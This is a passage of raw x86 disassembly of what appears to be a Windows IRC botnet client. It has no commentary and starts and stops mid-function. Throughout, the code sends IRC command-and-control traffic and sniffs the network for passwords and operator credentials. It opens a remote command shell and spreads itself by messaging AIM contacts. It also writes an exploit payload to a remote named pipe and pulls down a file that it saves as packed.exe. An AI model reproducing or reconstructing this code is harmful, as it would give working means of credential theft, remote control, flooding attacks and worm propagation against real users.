jnz short loc_403A25
push 8
call dword_4010D4 ; Sleep
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A25: ; CODE XREF: sub_40399D+10�j
; sub_40399D+20�j ...
pop esi
pop ebx
leave
retn 4
sub_40399D endp
; =============== S U B R O U T I N E =======================================
sub_403A2B proc near ; CODE XREF: sub_4027CB:loc_402857�p
mov dword_401A98, 1
retn
sub_403A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A36 proc near ; CODE XREF: sub_4027CB+A4�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
cmp dword_401A98, 1
jz short locret_403A76
push [ebp+arg_0]
lea eax, [ebp+var_200]
push offset a_500s ; "%.500s\n"
push eax
call dword_401110 ; wsprintfA
add esp, 0Ch
push 0
push eax
lea eax, [ebp+var_200]
push eax
push dword_4014B8
call dword_401134 ; send
locret_403A76: ; CODE XREF: sub_403A36+10�j
leave
retn 4
sub_403A36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A7A proc near ; DATA XREF: sub_40399D+5F�o
var_58C = byte ptr -58Ch
var_18C = byte ptr -18Ch
var_8C = byte ptr -8Ch
var_88 = byte ptr -88h
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_34 = byte ptr -34h
var_24 = byte ptr -24h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 58Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 11h
mov esi, eax
pop ecx
lea edi, [ebp+var_8C]
rep movsd
mov ebx, dword_4010B4
movsw
mov dword ptr [eax], 1
call ebx ; GetTickCount
mov esi, eax
shr eax, 1
mov edi, eax
and esi, 3
shr eax, 1
and eax, 3
and edi, 3
add eax, 4
add esi, 5
add edi, 4
mov [ebp+var_4], eax
call ebx ; GetTickCount
xor ebx, ebx
mov ecx, eax
cmp esi, ebx
mov [ebp+arg_0], ebx
jbe short loc_403AF5
loc_403AD0: ; CODE XREF: sub_403A7A+77�j
xor ecx, 96F050F2h
push 1Ah
mov eax, ecx
xor edx, edx
pop ebx
div ebx
mov eax, [ebp+arg_0]
shr ecx, 1
add dl, 61h
inc [ebp+arg_0]
cmp [ebp+arg_0], esi
mov [ebp+eax+var_44], dl
jb short loc_403AD0
xor ebx, ebx
loc_403AF5: ; CODE XREF: sub_403A7A+54�j
mov eax, [ebp+arg_0]
xor esi, esi
cmp edi, ebx
mov [ebp+eax+var_44], bl
jbe short loc_403B21
loc_403B02: ; CODE XREF: sub_403A7A+A3�j
xor ecx, 78D6BA83h
push 1Ah
mov eax, ecx
xor edx, edx
pop ebx
div ebx
shr ecx, 1
add dl, 61h
mov [ebp+esi+var_24], dl
inc esi
cmp esi, edi
jb short loc_403B02
xor ebx, ebx
loc_403B21: ; CODE XREF: sub_403A7A+86�j
mov [ebp+esi+var_24], bl
xor esi, esi
cmp [ebp+var_4], ebx
jbe short loc_403B4A
loc_403B2C: ; CODE XREF: sub_403A7A+CE�j
xor ecx, 0D9503521h
push 1Ah
mov eax, ecx
xor edx, edx
pop edi
div edi
shr ecx, 1
add dl, 61h
mov [ebp+esi+var_34], dl
inc esi
cmp esi, [ebp+var_4]
jb short loc_403B2C
loc_403B4A: ; CODE XREF: sub_403A7A+B0�j
push 6
push 1
push 2
mov [ebp+esi+var_34], bl
call dword_401128 ; socket
cmp eax, 0FFFFFFFFh
mov dword_4014B8, eax
jz loc_403C9B
push [ebp+var_48]
mov [ebp+var_14], 2
call dword_40115C ; htons
mov [ebp+var_12], ax
lea eax, [ebp+var_88]
push eax
call dword_401120 ; inet_addr
mov [ebp+var_10], eax
lea eax, [ebp+var_14]
push 10h
push eax
push dword_4014B8
call dword_401130 ; connect
cmp eax, 0FFFFFFFFh
jz loc_403C9B
lea eax, [ebp+var_34]
mov esi, dword_401110
push eax
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push offset aUser_16s_16s_1 ; "USER %.16s \"\" \"%.16s\" %.16s\n"
push eax
call esi ; wsprintfA
add esp, 14h
mov edi, dword_401134
push ebx
push eax
lea eax, [ebp+var_18C]
push eax
push dword_4014B8
call edi ; send
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_18C]
push offset dword_401A9C
push eax
call esi ; wsprintfA
add esp, 0Ch
push ebx
push eax
lea eax, [ebp+var_18C]
push eax
push dword_4014B8
call edi ; send
loc_403C09: ; CODE XREF: sub_403A7A+1CF�j
; sub_403A7A+1F3�j
xor esi, esi
loc_403C0B: ; CODE XREF: sub_403A7A+210�j
cmp dword_401A98, ebx
jnz short loc_403C8F
mov eax, 400h
push ebx
sub eax, esi
push eax
lea eax, [ebp+esi+var_58C]
push eax
push dword_4014B8
call dword_401140 ; recv
cmp eax, ebx
jle short loc_403C8F
add esi, eax
lea edi, [ebp+var_58C]
mov [ebp+esi+var_58C], bl
cmp [ebp+var_58C], bl
jz short loc_403C09
loc_403C4B: ; CODE XREF: sub_403A7A+1F1�j
push 0Dh
push edi
call sub_402E2E
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_403C6F
push edi
mov [eax], bl
call sub_403CA4
mov eax, [ebp+arg_0]
cmp [eax+2], bl
lea edi, [eax+2]
jnz short loc_403C4B
jmp short loc_403C09
; ---------------------------------------------------------------------------
loc_403C6F: ; CODE XREF: sub_403A7A+1DE�j
lea eax, [ebp+var_58C]
sub eax, edi
add esi, eax
lea eax, [esi+1]
push eax
lea eax, [ebp+var_58C]
push edi
push eax
call sub_402E0E
jmp loc_403C0B
; ---------------------------------------------------------------------------
loc_403C8F: ; CODE XREF: sub_403A7A+197�j
; sub_403A7A+1B8�j
push dword_4014B8
call dword_401144 ; closesocket
loc_403C9B: ; CODE XREF: sub_403A7A+E8�j
; sub_403A7A+126�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_403A7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CA4 proc near ; CODE XREF: sub_403A7A+1E3�p
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp byte ptr [edi], 3Ah
jnz short loc_403CCF
inc edi
push 20h
push edi
call sub_402E2E
mov edi, eax
test edi, edi
jz loc_403D76
and byte ptr [edi], 0
inc edi
loc_403CCF: ; CODE XREF: sub_403CA4+12�j
push 20h
push edi
call sub_402E2E
mov esi, eax
test esi, esi
jz loc_403D76
mov ebx, dword_4010B0
and byte ptr [esi], 0
push offset aPing ; "PING"
push edi
call ebx ; lstrcmp
test eax, eax
jnz short loc_403CFF
inc esi
push esi
push offset aPong_500s_0 ; "PONG %.500s\r\n"
jmp short loc_403D50
; ---------------------------------------------------------------------------
loc_403CFF: ; CODE XREF: sub_403CA4+50�j
push offset a433 ; "433"
push edi
call ebx ; lstrcmp
test eax, eax
jnz short loc_403D76
mov edi, dword_4010B4
call edi ; GetTickCount
mov esi, eax
and esi, 3
add esi, 5
call edi ; GetTickCount
xor ecx, ecx
mov edi, eax
test esi, esi
jbe short loc_403D42
loc_403D25: ; CODE XREF: sub_403CA4+9C�j
xor edi, 54287D75h
push 1Ah
mov eax, edi
xor edx, edx
pop ebx
div ebx
shr edi, 1
add dl, 61h
mov [ebp+ecx+var_10], dl
inc ecx
cmp ecx, esi
jb short loc_403D25
loc_403D42: ; CODE XREF: sub_403CA4+7F�j
and [ebp+ecx+var_10], 0
lea eax, [ebp+var_10]
push eax
push offset dword_401A9C
loc_403D50: ; CODE XREF: sub_403CA4+59�j
lea eax, [ebp+var_210]
push eax
call dword_401110 ; wsprintfA
add esp, 0Ch
push 0
push eax
lea eax, [ebp+var_210]
push eax
push dword_4014B8
call dword_401134 ; send
loc_403D76: ; CODE XREF: sub_403CA4+21�j
; sub_403CA4+37�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_403CA4 endp
; =============== S U B R O U T I N E =======================================
sub_403D7D proc near ; CODE XREF: sub_4027CB:loc_4029B6�p
cmp dword_401AD8, 1
jnz short locret_403D9D
xor eax, eax
push eax
push eax
push eax
push offset sub_403DA9
push eax
push eax
mov dword_401AD8, eax
call dword_401064 ; CreateThread
locret_403D9D: ; CODE XREF: sub_403D7D+7�j
retn
sub_403D7D endp
; =============== S U B R O U T I N E =======================================
sub_403D9E proc near ; CODE XREF: sub_4027CB+3E�p
mov dword_401AD8, 1
retn
sub_403D9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DA9 proc near ; DATA XREF: sub_403D7D+E�o
var_1D0 = byte ptr -1D0h
var_50 = byte ptr -50h
var_40 = byte ptr -40h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1D0h
push ebx
push esi
push edi
push 10h
pop edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_30]
push eax
mov [ebp+var_14], edi
push dword_4014BC
call dword_401138 ; getsockname
cmp eax, 0FFFFFFFFh
jz loc_403FF0
xor esi, esi
push esi
push 3
push 2
mov [ebp+var_2E], si
call dword_401128 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_18], ebx
jz loc_403FF0
lea eax, [ebp+var_30]
push edi
push eax
push ebx
call dword_401150 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_403E2E
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_1C]
push 4
push eax
push 98000001h
push ebx
mov [ebp+var_1C], 1
call dword_401154 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_403E3A
loc_403E2E: ; CODE XREF: sub_403DA9+5D�j
push ebx
call dword_401144 ; closesocket
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403E3A: ; CODE XREF: sub_403DA9+83�j
push 10000h
push esi
call dword_40108C ; GlobalAlloc
cmp dword_401AD8, esi
mov edi, eax
jnz loc_403FE9
jmp short loc_403E59
; ---------------------------------------------------------------------------
loc_403E56: ; CODE XREF: sub_403DA9+23A�j
mov ebx, [ebp+var_18]
loc_403E59: ; CODE XREF: sub_403DA9+AB�j
push esi
push 10000h
push edi
push ebx
call dword_401140 ; recv
cmp eax, 0FFFFFFFFh
jz loc_403FDD
cmp byte ptr [edi+9], 6
jnz loc_403FDD
mov bl, [edi]
and ebx, 0Fh
shl ebx, 2
cmp ebx, 3Ch
ja loc_403FDD
mov ax, [edi+2]
push eax
call dword_401158 ; htons
movzx ecx, byte ptr [ebx+edi+0Ch]
lea esi, [ebx+edi]
shr ecx, 4
movzx eax, ax
lea ebx, [ebx+ecx*4]
cmp ebx, eax
mov [ebp+var_10], ebx
jnb loc_403FDB
sub eax, ebx
mov ebx, dword_401158
mov [ebp+var_8], eax
mov ax, [esi]
push eax
call ebx ; htons
mov [ebp+var_4], eax
mov ax, [esi+2]
push eax
call ebx ; htons
mov ecx, [ebp+var_4]
mov [ebp+var_C], eax
cmp cx, 50h
jz loc_403FDB
cmp ax, 50h
jz loc_403FDB
cmp cx, 19h
jz loc_403FDB
cmp ax, 19h
jz loc_403FDB
cmp cx, 6Eh
jz loc_403FDB
cmp ax, 6Eh
jz loc_403FDB
cmp cx, 8Bh
jz loc_403FDB
cmp ax, 8Bh
jz loc_403FDB
mov eax, [ebp+var_10]
mov edx, [ebp+var_8]
xor ecx, ecx
lea esi, [eax+edi]
and byte ptr [esi+edx], 0
test edx, edx
jbe short loc_403F5B
loc_403F37: ; CODE XREF: sub_403DA9+1B0�j
mov al, [ecx+esi]
test al, al
jz loc_403FDB
cmp al, 7Fh
jg loc_403FDB
cmp al, 0Dh
jz short loc_403F52
cmp al, 0Ah
jnz short loc_403F56
loc_403F52: ; CODE XREF: sub_403DA9+1A3�j
mov byte ptr [ecx+esi], 20h
loc_403F56: ; CODE XREF: sub_403DA9+1A7�j
inc ecx
cmp ecx, edx
jb short loc_403F37
loc_403F5B: ; CODE XREF: sub_403DA9+18C�j
push offset dword_401CB0
push esi
call sub_402E46
test eax, eax
jnz short loc_403FDB
push esi
call sub_403FF9
cmp eax, 1
jnz short loc_403FDB
push dword ptr [edi+0Ch]
call dword_40111C ; inet_ntoa
test eax, eax
jz short loc_403FDB
mov ebx, dword_4010BC
push 10h
push eax
lea eax, [ebp+var_50]
push eax
call ebx ; lstrcpyn
push dword ptr [edi+10h]
call dword_40111C ; inet_ntoa
test eax, eax
jz short loc_403FDB
push 10h
push eax
lea eax, [ebp+var_40]
push eax
call ebx ; lstrcpyn
movzx eax, word ptr [ebp+var_C]
push esi
push eax
lea eax, [ebp+var_40]
push eax
movzx eax, word ptr [ebp+var_4]
push eax
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_1D0]
push offset a_16sHu_16sHu_2 ; "[%.16s:%hu->%.16s:%hu] \"%.256s\""
push eax
call dword_401110 ; wsprintfA
add esp, 1Ch
lea eax, [ebp+var_1D0]
push eax
call sub_40254D
loc_403FDB: ; CODE XREF: sub_403DA9+103�j
; sub_403DA9+12E�j ...
xor esi, esi
loc_403FDD: ; CODE XREF: sub_403DA9+C1�j
; sub_403DA9+CB�j ...
cmp dword_401AD8, esi
jz loc_403E56
loc_403FE9: ; CODE XREF: sub_403DA9+A5�j
push edi
call dword_401088 ; GlobalFree
loc_403FF0: ; CODE XREF: sub_403DA9+29�j
; sub_403DA9+48�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_403DA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FF9 proc near ; CODE XREF: sub_403DA9+1C2�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
and [ebp+var_4], 0
mov eax, offset a_332? ; "*:*.* 332 * #* :?* *"
mov ecx, eax
push esi
test ecx, ecx
mov [ebp+var_34], eax
mov [ebp+var_30], offset aPrivmsg? ; "*PRIVMSG * :?* *"
mov [ebp+var_2C], offset a?login ; "* :?login * *"
mov [ebp+var_28], offset a?set ; "* :?set * * *"
mov [ebp+var_24], offset a?Scan ; "* :?*scan* *"
mov [ebp+var_20], offset a?Syn ; "* :?*syn* *"
mov [ebp+var_1C], offset a?Udp ; "* :?*udp* *"
mov [ebp+var_18], offset a?Ddos ; "* :?*ddos* *"
mov [ebp+var_14], offset aUser? ; "USER ?* "
mov [ebp+var_10], offset aPass? ; "PASS ?* "
mov [ebp+var_C], offset aOper?? ; "OPER ?* ?* *"
mov [ebp+var_8], offset aJoin ; "JOIN #* *"
jz short loc_40407A
lea esi, [ebp+var_34]
loc_404062: ; CODE XREF: sub_403FF9+7F�j
push [ebp+arg_0]
push eax
call sub_403185
cmp eax, 1
jz short loc_404081
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_404062
loc_40407A: ; CODE XREF: sub_403FF9+64�j
xor eax, eax
loc_40407C: ; CODE XREF: sub_403FF9+8B�j
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_404081: ; CODE XREF: sub_403FF9+75�j
push 1
pop eax
jmp short loc_40407C
sub_403FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404086 proc near ; CODE XREF: sub_4027CB+1E1�p
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push 100h
push [ebp+arg_0]
lea eax, [ebp+var_100]
xor esi, esi
push eax
mov [ebp+var_104], esi
call dword_4010BC ; lstrcpyn
push esi
lea eax, [ebp+var_104]
push esi
push eax
push offset sub_4040DE
push esi
push esi
call dword_401064 ; CreateThread
test eax, eax
jz short loc_4040D9
loc_4040C7: ; CODE XREF: sub_404086+51�j
cmp [ebp+var_104], esi
jnz short loc_4040D9
push 8
call dword_4010D4 ; Sleep
jmp short loc_4040C7
; ---------------------------------------------------------------------------
loc_4040D9: ; CODE XREF: sub_404086+3F�j
; sub_404086+47�j
pop esi
leave
retn 4
sub_404086 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040DE proc near ; DATA XREF: sub_404086+30�o
var_254 = byte ptr -254h
var_154 = byte ptr -154h
var_54 = dword ptr -54h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 100h
lea eax, [edi+4]
push eax
lea eax, [ebp+var_154]
push eax
call dword_4010BC ; lstrcpyn
push 1
lea eax, [ebp+var_154]
pop esi
push 3Ah
push eax
mov [edi], esi
call sub_402E2E
xor ebx, ebx
cmp eax, ebx
jz loc_404213
mov [eax], bl
inc eax
xor edi, edi
loc_404125: ; CODE XREF: sub_4040DE+59�j
mov cl, [eax]
cmp cl, bl
jz short loc_404139
movzx cx, cl
lea edx, [edi+edi*4]
inc eax
lea edi, [ecx+edx*2-30h]
jmp short loc_404125
; ---------------------------------------------------------------------------
loc_404139: ; CODE XREF: sub_4040DE+4B�j
lea eax, [ebp+var_154]
push eax
call dword_401120 ; inet_addr
push edi
mov [ebp+var_C], eax
call dword_40115C ; htons
cmp [ebp+var_C], ebx
mov edi, dword_401144
push ebx
push ebx
push ebx
push 6
push esi
mov [ebp+var_E], ax
mov [ebp+var_10], 2
push 2
jnz short loc_40419F
call dword_401118 ; WSASocketA
mov esi, eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
mov [ebp+arg_0], esi
call dword_401150 ; bind
push ebx
push esi
call dword_40112C ; listen
push ebx
push ebx
push esi
call dword_40114C ; accept
push [ebp+arg_0]
mov esi, eax
call edi ; closesocket
jmp short loc_4041B4
; ---------------------------------------------------------------------------
loc_40419F: ; CODE XREF: sub_4040DE+8D�j
call dword_401118 ; WSASocketA
mov esi, eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_401130 ; connect
loc_4041B4: ; CODE XREF: sub_4040DE+BF�j
lea eax, [ebp+var_54]
push 44h
push eax
call sub_402DBC
lea eax, [ebp+var_254]
push 100h
push eax
push offset aComspecQ ; "\"%comspec%\" /Q"
mov [ebp+var_54], 44h
mov [ebp+var_28], 181h
mov [ebp+var_24], bx
mov [ebp+var_18], esi
mov [ebp+var_1C], esi
mov [ebp+var_14], esi
call dword_401090 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_54]
push offset dword_401650
push eax
push ebx
push ebx
push 10h
push 1
push ebx
lea eax, [ebp+var_254]
push ebx
push eax
push ebx
call dword_4010AC ; CreateProcessA
push esi
call edi ; closesocket
loc_404213: ; CODE XREF: sub_4040DE+3C�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4040DE endp
; =============== S U B R O U T I N E =======================================
sub_40421C proc near ; CODE XREF: sub_4027CB+163�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push offset a_oscar_statusn ; "_Oscar_StatusNotify"
call dword_401108 ; FindWindowA
mov edi, eax
cmp edi, ebx
jz loc_404355
mov esi, dword_401104
push ebx
push 4E23h
push 111h
push edi
call esi ; SendMessageA
push ebx
push edi
call dword_401100 ; GetWindowThreadProcessId
mov edi, dword_4010FC
push ebx
push offset a32770 ; "#32770"
push ebx
mov [esp+18h+arg_0], eax
push ebx
loc_404267: ; CODE XREF: sub_40421C+6D�j
call edi ; FindWindowExA
mov ebp, eax
cmp ebp, ebx
jz loc_404355
push ebx
push ebp
call dword_401100 ; GetWindowThreadProcessId
push ebx
push offset a32770 ; "#32770"
cmp eax, [esp+14h+arg_0]
jz short loc_40428B
push ebp
push ebx
jmp short loc_404267
; ---------------------------------------------------------------------------
loc_40428B: ; CODE XREF: sub_40421C+69�j
push ebx
push ebp
call edi ; FindWindowExA
cmp eax, ebx
jz loc_404355
push ebx
push offset a_oscar_tree ; "_Oscar_Tree"
push ebx
push eax
call edi ; FindWindowExA
mov edi, eax
cmp edi, ebx
jz loc_404355
push ebx
mov ebp, 18Bh
push ebx
push ebp
push edi
call esi ; SendMessageA
push ebx
push eax
push 186h
push edi
call esi ; SendMessageA
push ebx
push 25h
push 100h
push edi
call esi ; SendMessageA
push ebx
push 25h
push 101h
push edi
call esi ; SendMessageA
push ebx
push ebx
push ebp
push edi
call esi ; SendMessageA
mov ebp, eax
sub ebp, 2
js short loc_404306
loc_4042E3: ; CODE XREF: sub_40421C+E8�j
push ebx
push ebp
push 186h
push edi
call esi ; SendMessageA
push ebx
push 27h
push 100h
push edi
call esi ; SendMessageA
push ebx
push 27h
push 101h
push edi
call esi ; SendMessageA
dec ebp
jns short loc_4042E3
loc_404306: ; CODE XREF: sub_40421C+C5�j
push ebx
push ebx
push 18Bh
push edi
call esi ; SendMessageA
xor ebp, ebp
cmp eax, ebx
mov [esp+14h+var_4], eax
jle short loc_404355
loc_40431A: ; CODE XREF: sub_40421C+137�j
push ebx
push ebp
push 186h
push edi
call esi ; SendMessageA
push ebx
push 20h
push 100h
push edi
call esi ; SendMessageA
push ebx
push 20h
push 101h
push edi
call esi ; SendMessageA
push [esp+14h+arg_0]
call sub_40435D
push 7D0h
call dword_4010D4 ; Sleep
inc ebp
cmp ebp, [esp+14h+var_4]
jl short loc_40431A
loc_404355: ; CODE XREF: sub_40421C+17�j
; sub_40421C+51�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 4
sub_40421C endp
; =============== S U B R O U T I N E =======================================
sub_40435D proc near ; CODE XREF: sub_40421C+122�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, dword_4010FC
push edi
push offset aInstantMessage ; "Instant Message"
xor edi, edi
push offset aAim_imessage ; "AIM_IMessage"
push edi
push edi
call esi ; FindWindowExA
mov ebx, eax
cmp ebx, edi
jz loc_404426
push ebp
loc_404381: ; CODE XREF: sub_40435D+C2�j
push edi
push offset aWndate32class ; "WndAte32Class"
push edi
loc_404388: ; CODE XREF: sub_40435D+61�j
push ebx
call esi ; FindWindowExA
mov ebp, eax
push edi
cmp ebp, edi
jz short loc_4043C0
push offset aCbclass ; "CBClass"
push edi
push ebp
call esi ; FindWindowExA
test eax, eax
jz short loc_4043B7
push edi
push offset aAte32class ; "Ate32Class"
push edi
push ebp
call esi ; FindWindowExA
push [esp+10h+arg_0]
push edi
push 0Ch
push eax
call dword_401104 ; SendMessageA
loc_4043B7: ; CODE XREF: sub_40435D+40�j
push edi
push offset aWndate32class ; "WndAte32Class"
push ebp
jmp short loc_404388
; ---------------------------------------------------------------------------
loc_4043C0: ; CODE XREF: sub_40435D+33�j
push offset a_oscar_iconbtn ; "_Oscar_IconBtn"
push edi
loc_4043C6: ; CODE XREF: sub_40435D+A3�j
push ebx
call esi ; FindWindowExA
mov ebp, eax
cmp ebp, edi
jz short loc_404402
push ebp
call dword_40110C ; GetMenu
cmp eax, 199h
jnz short loc_4043F9
push edi
push edi
push 201h
push ebp
call dword_401104 ; SendMessageA
push edi
push edi
push 202h
push ebp
call dword_401104 ; SendMessageA
loc_4043F9: ; CODE XREF: sub_40435D+7E�j
push edi
push offset a_oscar_iconbtn ; "_Oscar_IconBtn"
push ebp
jmp short loc_4043C6
; ---------------------------------------------------------------------------
loc_404402: ; CODE XREF: sub_40435D+70�j
push edi
push edi
push 10h
push ebx
call dword_401104 ; SendMessageA
push offset aInstantMessage ; "Instant Message"
push offset aAim_imessage ; "AIM_IMessage"
push edi
push edi
call esi ; FindWindowExA
mov ebx, eax
cmp ebx, edi
jnz loc_404381
pop ebp
loc_404426: ; CODE XREF: sub_40435D+1D�j
pop edi
pop esi
pop ebx
retn 4
sub_40435D endp
; =============== S U B R O U T I N E =======================================
sub_40442C proc near ; DATA XREF: sub_402FC3+19B�o
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_40443A
xor eax, eax
retn 4
sub_40442C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40443A proc near ; CODE XREF: sub_40442C+4�p
var_8C4 = byte ptr -8C4h
var_864 = byte ptr -864h
var_818 = dword ptr -818h
var_806 = byte ptr -806h
var_709 = word ptr -709h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push [ebp+arg_0]
call dword_40111C ; inet_ntoa
mov esi, dword_401110
push eax
lea eax, [ebp+var_28]
push offset a_16sPipe ; "\\\\%.16s\\pipe"
push eax
call esi ; wsprintfA
lea eax, [ebp+var_28]
add esp, 0Ch
xor ebx, ebx
mov [ebp+var_34], eax
mov eax, offset dword_4014B4
push ebx
push eax
push eax
lea eax, [ebp+var_48]
mov [ebp+var_44], ebx
push eax
mov [ebp+var_38], ebx
mov [ebp+var_2C], ebx
call sub_40465A
test eax, eax
jnz loc_404597
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_88]
push offset a_24sBrowser ; "%.24s\\browser"
push eax
call esi ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_88]
push ebx
push ebx
push 3
push ebx
push ebx
push 0C0000000h
push eax
call dword_401098 ; CreateFileA
mov edi, eax
push ebx
cmp edi, 0FFFFFFFFh
jz loc_40458D
mov esi, dword_401094
lea eax, [ebp+var_8]
push eax
push 48h
push offset dword_401FE0
push edi
call esi ; WriteFile
test eax, eax
jz loc_404585
call dword_4010B4 ; GetTickCount
mov [ebp+var_4], eax
mov eax, 0FF00h
test word ptr [ebp+var_4], ax
jnz short loc_4044FA
xor [ebp+var_4], eax
loc_4044FA: ; CODE XREF: sub_40443A+BB�j
cmp byte ptr [ebp+var_4], bl
jnz short loc_404506
xor [ebp+var_4], 0FFh
loc_404506: ; CODE XREF: sub_40443A+C3�j
push 60h
lea eax, [ebp+var_8C4]
push offset dword_402028
push eax
call sub_402E0E
push 90h
lea eax, [ebp+var_864]
push 7D0h
push eax
call sub_402DDD
push 191h
lea eax, [ebp+var_806]
push offset loc_401E4C
push eax
mov [ebp+var_818], 75021E3Eh
call sub_402E0E
mov ax, word ptr [ebp+var_4]
push 0Ch
mov [ebp+var_709], ax
lea eax, [ebp+var_94]
push offset dword_402088
push eax
call sub_402E0E
lea eax, [ebp+var_8]
push ebx
push eax
lea eax, [ebp+var_8C4]
push 83Ch
push eax
push edi
call esi ; WriteFile
test eax, eax
jnz short loc_40459B
loc_404585: ; CODE XREF: sub_40443A+A3�j
push edi
call dword_401054 ; CloseHandle
push ebx
loc_40458D: ; CODE XREF: sub_40443A+87�j
lea eax, [ebp+var_28]
push ebx
push eax
call sub_404654
loc_404597: ; CODE XREF: sub_40443A+4E�j
xor eax, eax
jmp short loc_4045C3
; ---------------------------------------------------------------------------
loc_40459B: ; CODE XREF: sub_40443A+149�j
push 800h
call dword_4010D4 ; Sleep
push edi
call dword_401054 ; CloseHandle
push ebx
lea eax, [ebp+var_28]
push ebx
push eax
call sub_404654
push [ebp+var_4]
push [ebp+arg_0]
call sub_4045CA
loc_4045C3: ; CODE XREF: sub_40443A+15F�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40443A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045CA proc near ; CODE XREF: sub_40443A+184�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor esi, esi
push esi
push 8000080h
push 3
push esi
mov [ebp+var_C], eax
mov ax, word ptr [ebp+arg_4]
push 1
push 1
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov [ebp+var_10], 2
mov [ebp+var_E], ax
call dword_401098 ; CreateFileA
push 6
push 1
push 2
mov ebx, eax
call dword_401128 ; socket
lea ecx, [ebp+var_10]
push 10h
push ecx
push eax
mov [ebp+arg_4], eax
call dword_401130 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_404627
xor eax, eax
jmp short loc_404641
; ---------------------------------------------------------------------------
loc_404627: ; CODE XREF: sub_4045CA+57�j
push 1
push esi
push esi
push esi
push esi
push ebx
push [ebp+arg_4]
call sub_40464E
push ebx
mov esi, eax
call dword_401054 ; CloseHandle
mov eax, esi
loc_404641: ; CODE XREF: sub_4045CA+5B�j
pop esi
pop ebx
leave
retn 8
sub_4045CA endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404648 proc near ; CODE XREF: sub_402FC3+15C�p
; sub_402FC3+16D�p
jmp dword_401170
sub_404648 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
